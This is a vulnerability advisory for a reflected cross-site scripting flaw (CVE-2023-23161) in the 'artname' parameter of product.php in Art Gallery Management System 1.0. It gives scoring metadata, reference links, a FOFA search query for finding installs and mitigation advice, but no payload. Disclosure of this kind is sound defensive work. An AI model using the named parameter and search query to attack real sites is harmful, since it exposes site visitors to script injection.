vendor:
Art Gallery Management System Project
by:
Rahul Patwari
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Art Gallery Management System Project
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-23161
CPE: a:phpgurukul:art_gallery_management_system_project:1.0
Tags: cve,cve2023,art,gallery,xss
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei References:
https://www.exploit-db.com/exploits/51214, https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt, https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html, https://nvd.nist.gov/vuln/detail/CVE-2023-23161
Nuclei Metadata: {'max-request': 1, 'verified': True, 'fofa-query': 'title="Art Gallery Management System"', 'vendor': 'art_gallery_management_system_project', 'product': 'art_gallery_management_system'}
Platforms Tested: XAMPP / Windows 10
2023
Art Gallery Management System Project v1.0 – Reflected Cross-Site Scripting (XSS)
This exploit allows an attacker to inject malicious code into a web application, which is then executed by the victim's browser. In this specific case, the vulnerability exists in the 'artname' parameter of the 'product.php' page. By inserting a crafted XSS payload, an attacker can trigger the execution of arbitrary JavaScript code on the victim's browser.
Mitigation:
To mitigate this vulnerability, the application should implement proper input validation and output encoding to prevent the execution of malicious code. Specifically, the 'artname' parameter should be properly validated and sanitized before being displayed to the user.
